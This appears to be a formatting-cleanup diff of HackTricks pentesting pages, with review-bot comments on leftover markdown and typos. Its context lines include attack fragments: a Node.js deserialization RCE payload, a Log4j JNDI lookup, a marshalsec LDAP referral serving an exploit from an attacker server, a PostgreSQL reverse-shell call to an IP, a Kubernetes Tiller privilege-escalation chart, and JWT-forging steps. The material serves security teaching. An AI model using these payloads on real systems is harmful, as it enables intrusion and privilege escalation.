As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
|
||||
|
||||
```markup
|
||||
<!-- javascriptBridge is the name of the Android exposed object -->
|
||||
|
|
|
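Review bot: in the new line the link text `[**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)` has a space before the closing bracket, so the rendered link includes a trailing space and nothing separates it from the following `(`; move the space outside the bracket. `once you found a JavascriptBridge` should be `once you find a JavascriptBridge`.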
@ -64,8 +64,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
|
||||
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
|
||||
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
|
||||
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>)
|
||||
|
|
|
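Review bot: the new line `****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](...)` still starts with `****`; only the two copies around the repository link were removed. The leading one should go too, otherwise the commit's stated purpose is only partly met for this file.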
@ -11,8 +11,8 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
### Preparation
|
||||
|
||||
* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)****
|
||||
* [ ] Prepare your environment reading **** [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
|
||||
* [ ] Read all the sections of **** [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) **** to learn common actions to pentest an iOS application
|
||||
* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
|
||||
* [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application
|
||||
|
||||
### Data Storage
|
||||
|
||||
|
|
|
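Review bot: the new line `* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****` still ends in `****`, and the unchanged context line above it, `* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)****`, has the same trailing `****`; both should be stripped in this sweep.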
@ -319,7 +319,7 @@ After this, the `Telegram.ipa` file will be created in your current directory. Y
|
|||
|
||||
#### flexdecrypt
|
||||
|
||||
In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) **** or a wrapper of the tool called **** [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
|
||||
In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) or a wrapper of the tool called [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
|
||||
****In any case you will need to **install flexdecrypt in the device** running something like:
|
||||
|
||||
```markup
|
||||
|
|
|
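Review bot: the trailing context line `****In any case you will need to **install flexdecrypt in the device** running something like:` still opens with `****`, and the new line ends with the bold period `**.**` after the flexdump link; both are the residue this commit is meant to remove.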
@ -10,7 +10,7 @@ WebViews are in-app browser components for displaying interactive **web** **cont
|
|||
* The **`JavaScriptCanOpenWindowsAutomatically`** can be used to **prevent** JavaScript from **opening new windows**, such as pop-ups.
|
||||
* The **`hasOnlySecureContent`** property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.
|
||||
* `WKWebView` implements out-of-process rendering, so **memory corruption bugs won't affect** the main app process.
|
||||
* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It **** should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
|
||||
* ****[**SFSafariViewController**](https://developer.apple.com/documentation/safariservices/sfsafariviewcontroller)**:** It should be used to provide a **generalized web viewing experience**. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
|
||||
|
||||
* A read-only address field with a security indicator.
|
||||
* An Action ("**Share**") **button**.
|
||||
|
|
|
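Review bot: the new line still begins with `* ****[**SFSafariViewController**](...)`; the `****` before the link was not removed, only the one before `should`. The bold colon `**:**` right after the link is the same export artifact.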
@ -195,7 +195,7 @@ var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', funct
|
|||
serialize.unserialize(test);
|
||||
```
|
||||
|
||||
You can **** [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
|
||||
You can [**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
|
||||
|
||||
### [funcster](https://www.npmjs.com/package/funcster)
|
||||
|
||||
|
@ -297,8 +297,8 @@ find . -iname "*commons*collection*"
|
|||
grep -R InvokeTransformer .
|
||||
```
|
||||
|
||||
You could try to **check all the libraries** known to be vulnerable and that **** [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
|
||||
You could also use **** [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
|
||||
You could try to **check all the libraries** known to be vulnerable and that [**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).\
|
||||
You could also use [**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.\
|
||||
When running **gadgetinspector** (after building it) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
|
||||
|
||||
#### Black Box Test
|
||||
|
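Review bot: the new line's link text `[**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide` puts the space inside the brackets, so the rendered link has a trailing space and runs directly into `can`; move the space after the `)`. The trailing context line also spells the results path as `gadget-chains-year-month-day-hore-min.txt` (`hore` should be `hour`).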
@ -308,7 +308,7 @@ Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetpr
|
|||
****GadgetProbe is focused on ** `ObjectInputStream` ** deserializations**.**
|
||||
|
||||
Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.\
|
||||
[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) **** \
|
||||
[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) \
|
||||
****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
|
||||
|
||||
You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.\
|
||||
|
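Review bot: two context lines in this hunk still start with `****`: `****GadgetProbe is focused on ...` and `****Java Deserialization Scanner is focused on ...`; the first also has the odd bolding `** \`ObjectInputStream\` **`. Since the hunk already edits the line between them, these could be cleaned up in the same change.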
@ -323,7 +323,7 @@ If you find a java serialized object being sent to a web application, **you can
|
|||
|
||||
#### **ysoserial**
|
||||
|
||||
The most well-known tool to exploit Java deserializations is **** [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
|
||||
The most well-known tool to exploit Java deserializations is [**ysoserial**](https://github.com/frohoff/ysoserial) ([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)). You can also consider using [**ysoseral-modified**](https://github.com/pimps/ysoserial-modified) which will allow you to use complex commands (with pipes for example).\
|
||||
****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.\
|
||||
I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
|
||||
|
||||
|
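Review bot: the context line `****Note that this tool is **focused** on exploiting **\`ObjectInputStream\`**.` still starts with `****`. In the new line the link text `[**ysoseral-modified**]` misspells the project name; the URL it points to is `.../pimps/ysoserial-modified`.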
@ -657,7 +657,7 @@ Therefore the **`--test`** parameter allows us to understand **which chunks of c
|
|||
|
||||
### ViewState
|
||||
|
||||
Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, **** [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
|
||||
Take a look to [this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ](exploiting-\_\_viewstate-parameter.md)to **execute arbitrary code.** If you **already know the secrets** used by the victim machine, [**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)**.**
|
||||
|
||||
### **Prevention**
|
||||
|
||||
|
|
|
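Review bot: the new line still carries the bold period `**.**` after `[**read this post to know to execute code**](exploiting-\_\_viewstate-knowing-the-secret.md)`, and the first link text `[this POST about **how to try to exploit the \_\_ViewState parameter of .Net** ]` has a space before the closing bracket, so the link runs into `to`. `Take a look to` should be `Take a look at`, and `know to execute code` is missing `how`.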
@ -52,7 +52,7 @@ namespace ODPCustomSerialExample
|
|||
}
|
||||
```
|
||||
|
||||
Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ **** in order to load `System.Windows.Data`
|
||||
Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ in order to load `System.Windows.Data`
|
||||
|
||||
## ExpandedWrapper
|
||||
|
||||
|
|
|
@ -147,7 +147,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
|
|||
|
||||
**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
|
||||
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) **** with Java classes for being tested.
|
||||
Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) with Java classes for being tested.
|
||||
|
||||
![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)
|
||||
|
||||
|
|
|
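Review bot: the unchanged context line above the edit spells the tool as `GadgProbe`, has `it''s` with a doubled apostrophe, and `this class exist` should be `this class exists`; worth fixing while the file is open.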
@ -94,7 +94,7 @@ In [**LOG4J2-313**](https://issues.apache.org/jira/browse/LOG4J2-313) added a `j
|
|||
|
||||
With a **: present** in the key, as in `${jndi:ldap://example.com/a}` there’s **no prefix** and the **LDAP server is queried for the object**. And these Lookups can be used in both the configuration of Log4j as well as when lines are logged.
|
||||
|
||||
Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**. And because this is a library widely used by Java applications to log information (Internet facing applications included) it was very common to have log4j logging for example HTTP headers received like the User-Agent. **** However, log4j is **not used to log only HTTP information but any input** and data the developer indicated.
|
||||
Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**. And because this is a library widely used by Java applications to log information (Internet facing applications included) it was very common to have log4j logging for example HTTP headers received like the User-Agent. However, log4j is **not used to log only HTTP information but any input** and data the developer indicated.
|
||||
|
||||
## Log4Shell CVEs
|
||||
|
||||
|
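Review bot: the new line `Therefore, the only thing needed to get RCE a **vulnerable version of Log4j processing information controlled by the user**.` is missing its verb: `the only thing needed to get RCE is a vulnerable version ...`.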
@ -106,7 +106,7 @@ Therefore, the only thing needed to get RCE a **vulnerable version of Log4j proc
|
|||
\
|
||||
Threat intel analyst Florian Roth shared Sigma rules \[[1](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j\_fields.yml), [2](https://github.com/SigmaHQ/sigma/blob/master/rules/web/web\_cve\_2021\_44228\_log4j.yml)] that can be employed as one of the defenses.\
|
||||
 
|
||||
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) **** \[**Critical**, previously Low]: This one is a Denial of Service (DoS) flaw scoring a ~~3.7~~ 9.0. The flaw arose as a result of an **incomplete fix that went into 2.15.0** for CVE-2021-44228. While the fix applied to 2.15.0 did largely resolve the flaw, that wasn't quite the case for certain **non-default configurations**.\
|
||||
* [**CVE-2021-45046**](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) \[**Critical**, previously Low]: This one is a Denial of Service (DoS) flaw scoring a ~~3.7~~ 9.0. The flaw arose as a result of an **incomplete fix that went into 2.15.0** for CVE-2021-44228. While the fix applied to 2.15.0 did largely resolve the flaw, that wasn't quite the case for certain **non-default configurations**.\
|
||||
\
|
||||
Log4j 2.15.0 makes "a best-effort attempt" to **restrict JNDI LDAP lookups to **_**localhost**_ by default. But, **attackers** who have **control** over the **Thread Context Map (MDC)** input data can craft malicious payloads via the JNDI Lookup patterns to cause DoS attacsk. This applies to non-default configurations in which a non-default Pattern Layout using either a Context Lookup, e.g. \$${ctx:loginId}, or a Thread Context Map pattern (%X, %mdc, or %MDC).\
|
||||
\
|
||||
|
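Review bot: the context line after the edit has `DoS attacsk` (should be `attacks`) and the broken bold markup `**restrict JNDI LDAP lookups to **_**localhost**_`, where the closing `**` lands after `to ` and leaves the `_**localhost**_` nesting inconsistent. The line above the edited one is a lone non-breaking space that renders as an empty paragraph.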
@ -233,7 +233,7 @@ For **more information** (_like limitations on RMI and CORBA vectors_) **check t
|
|||
|
||||
_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](https://tryhackme.com/room/solar)_****_
|
||||
|
||||
For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a **** [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served:
|
||||
For this exploit the tool [**marshalsec**](https://github.com/mbechler/marshalsec) (download a [**jar version from here**](https://github.com/RandomRobbieBF/marshalsec-jar)) will be used to create a LDAP referral server to direct connections to our secondary HTTP server were the exploit will be served:
|
||||
|
||||
```bash
|
||||
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http:/<your_ip_http_server>:8000/#Exploit"
|
||||
|
|
|
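Review bot: the context line `_This trick is entirely taken from the **THM box:**_ [_**https://tryhackme.com/room/solar**_](...)_****_` still ends with `_****_`, the same artifact wrapped in italics. In the new line, `our secondary HTTP server were the exploit will be served` should read `where`.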
@ -2,7 +2,7 @@
|
|||
|
||||
## Discovering using Automatic tools
|
||||
|
||||
The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **** can be used to **find prototype pollution vulnerabilities**. 
|
||||
The tools [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0) and [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) can be used to **find prototype pollution vulnerabilities**. 
|
||||
|
||||
Moreover, you could also use the **browser extension** [**PPScan**](https://github.com/msrkp/PPScan) to **automatically** **scan** the **pages** you **access** for prototype pollution vulnerabilities.
|
||||
|
||||
|
|
|
@ -22,5 +22,5 @@ So where is the bug? **When upgrading a connection, the reverse proxy will often
|
|||
|
||||
The original blog post points out that not all servers will forward the required headers for a compliant H2C connection upgrade. This means load balancers like AWS ALB/CLB, NGINX, and Apache Traffic Server amongst others will **prevent a H2C connection by default**. However, at the end of the blog post, he does mention that “not all backends were compliant, and we could **test with the non-compliant `Connection: Upgrade` variant, where the `HTTP2-Settings` value is omitted** from the `Connection` header.”
|
||||
|
||||
Using the tools **** [**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler) **and** [**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler) **** you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
|
||||
Using the tools [**https://github.com/BishopFox/h2csmuggler**](https://github.com/BishopFox/h2csmuggler) **and** [**https://github.com/assetnote/h2csmuggler**](https://github.com/assetnote/h2csmuggler) you can try to **bypass the protections imposed** by the proxy establishing a H2C connection and access proxy protected resources.
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
## **Quick Wins**
|
||||
|
||||
Run [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) **** with mode `All Tests!` and wait for green lines
|
||||
Run [**jwt\_tool**](https://github.com/ticarpi/jwt\_tool) with mode `All Tests!` and wait for green lines
|
||||
|
||||
```bash
|
||||
python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" -rh "Authorization: Bearer eyJhbG...<JWT Token>"
|
||||
|
@ -139,7 +139,7 @@ openssl rsa -in keypair.pem -pubout -out publickey.crt
|
|||
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
|
||||
```
|
||||
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created.** In order to create a valid jku certificate you can download the original one anche change the needed parameters.
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter jku to the certificate created.** In order to create a valid jku certificate you can download the original one anche change the needed parameters.
|
||||
|
||||
You can obtain the parametes "e" and "n" from a public certificate using:
|
||||
|
||||
|
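Review bot: the new line has `download the original one anche change the needed parameters`; `anche` should be `and`. The context line below it spells `parametes` for `parameters`.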
@ -165,7 +165,7 @@ openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out at
|
|||
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
|
||||
```
|
||||
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) **** to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
|
||||
Then you can use for example [**jwt.io**](https://jwt.io) to create the new JWT with the **created public and private keys and pointing the parameter x5u to the certificate .crt created.**
|
||||
|
||||
![](<../.gitbook/assets/image (439).png>)
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ If you find a login page, here you can find some techniques to try to bypass it:
|
|||
* Check to **not send the parameters** (do not send any or only 1)
|
||||
* Check the **PHP comparisons error:** _user\[]=a\&pwd=b_ , _user=a\&pwd\[]=b_ , _user\[]=a\&pwd\[]=b_
|
||||
* Check credentials:
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) **** of the technology/platform used
|
||||
* [**Default credentials**](../../brute-force.md#default-credentials) of the technology/platform used
|
||||
* **Common combinations** (root, admin, password, name of the tech, default user with one of these passwords).
|
||||
* Create a dictionary using **Cewl**, **add** the **default** username and password (if there is) and try to brute-force it using all the words as **usernames and password**
|
||||
* **Brute-force** using a bigger **dictionary (**[**Brute force**](../../brute-force.md#http-post-form)**)**
|
||||
|
|
|
@ -165,7 +165,7 @@ If you can get the **authorization code and use it with a different client then
|
|||
|
||||
### AWS Cognito <a href="#bda5" id="bda5"></a>
|
||||
|
||||
In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **** you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
|
||||
In this bug bounty report: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) you can see that the **token** that **AWS Cognito** gives back to the user might have **enough permissions to overwrite the user data**. Therefore, if you can **change the user email for a different user email**, you might be able to **take over** others accounts.
|
||||
|
||||
```
|
||||
# Read info of the user
|
||||
|
@ -239,7 +239,7 @@ The following parameters are particularly interesting for SSRF attacks:
|
|||
|
||||
## OAuth providers Race Conditions
|
||||
|
||||
If the platform you are testing is an OAuth provider **** [**read this to test for possible Race Conditions**](race-condition.md).
|
||||
If the platform you are testing is an OAuth provider [**read this to test for possible Race Conditions**](race-condition.md).
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -66,7 +66,7 @@ Note in this case how the **first thing** that the code is doing is **checking t
|
|||
|
||||
In order to **find event listeners** in the current page you can:
|
||||
|
||||
* **Search** the JS code for **** `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Execute** in the developer tools console: `getEventListeners(window)`
|
||||
|
||||
![](<../.gitbook/assets/image (618) (1) (1).png>)
|
||||
|
|
|
@ -248,7 +248,7 @@ select connect_back('192.168.100.54', 1234);
|
|||
_Note that you don't need to append the `.dll` extension as the create function will add it._
|
||||
|
||||
For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
|
||||
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) **** (_to learn how to compile a postgres extension read any of the previous versions_).\
|
||||
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
|
||||
In the same page this **exploit to automate** this technique was given:
|
||||
|
||||
```python
|
||||
|
|
|
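Review bot: the context line `For more information **read the**[ **original publication here**](...)**.**` has the space inside the link text and a bold period `**.**`; the new line's `code use to generate the postgres extension` should be `code used to generate`.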
@ -183,7 +183,7 @@ Taken from the blog of [Jorge Lajara](https://jlajara.gitlab.io/posts/2019/11/30
|
|||
The last one is using 2 unicode characters which expands to 5: telsr\
|
||||
More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
|
||||
To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).\
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) **** and [**here**](https://tinyxss.terjanq.me).
|
||||
**More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
|
||||
|
||||
### Click XSS - Clickjacking
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
**If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
|
||||
|
||||
The following information was taken from **** [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
|
||||
The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
|
||||
|
||||
### PDF-Lib
|
||||
|
||||
|
|
|
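Review bot: the new line `The following information was taken from [**https://portswigger.net/research/portable-data-exfiltration**](...)****` still ends with `****`; only the `****` before the link was removed.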
@ -17,7 +17,7 @@ Summing it all up:
|
|||
|
||||
1. Use Wireshark to **intercept** the **initial traffic** during **authorization**. This will be helped by ‘tns’ filter.
|
||||
2. Extract **HEX values for AUTH\_SESSKEY, AUTH\_VFR\_DATA**.
|
||||
3. Insert them into **** [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
|
||||
3. Insert them into [**PoC script**](https://www.exploit-db.com/exploits/22069), which will perform a dictionary (brute force) attack.
|
||||
|
||||
### Using nmap and john
|
||||
|
||||
|
|
|
@ -56,7 +56,7 @@ helm --host tiller-deploy.kube-system:44134 version
|
|||
|
||||
By default **Helm2** was installed in the **namespace kube-system** with **high privileges**, so if you find the service and has access to it, this could allow you to **escalate privileges**.
|
||||
|
||||
All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) **** that will give the **default service token access to everything in the whole cluster.**
|
||||
All you need to do is to install a package like this one: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) that will give the **default service token access to everything in the whole cluster.**
|
||||
|
||||
```
|
||||
git clone https://github.com/Ruil1n/helm-tiller-pwn
|
||||
|
@ -64,4 +64,4 @@ helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-
|
|||
/pwnchart
|
||||
```
|
||||
|
||||
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and **** [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) **** inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.
|
||||
In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **explanation of the attack**, but basically, if you read the files [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) and [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) inside _helm-tiller-pwn/pwnchart/templates/_ you can see how **all the privileges are being given to the default token**.
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
**TFTP** uses UDP port 69 and **requires no authentication**—clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.
|
||||
|
||||
**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) **** (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). PLEASE, LET ME KNOW IF YOU HAVE SOME INFORMATION ABOUT THIS IN THE [**HackTricks telegram group**](https://t.me/peass) (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)).
|
||||
|
||||
**Default Port:** 69/UDP
@ -43,7 +43,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
```
That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) **** (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) (it uses HTTP basic auth, so anything that BF HTTP basic auth can be used).\
Here you have a **list default usernames**: _**elastic** (superuser), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system,_ \_anonymous_._ Older versions of Elasticsearch have the default password **changeme** for this user
```
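Review bot: the modified line still carries several typos that this commit could fix while it is touching the line: "That will means that authentication is configured an **you need valid credentials**" should read "That means authentication is configured and **you need valid credentials**", and "elasticserach" should be "elasticsearch".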
@ -281,7 +281,7 @@ kubectl port-forward pod/mypod 5000:5000
### **Impersonating privileged accounts**
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) **** privilege, an attacker could impersonate a privileged account.
With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account.
In this example, the service account _**sa-imper**_ has a binding to a ClusterRole with rules that allow it to impersonate groups and users.
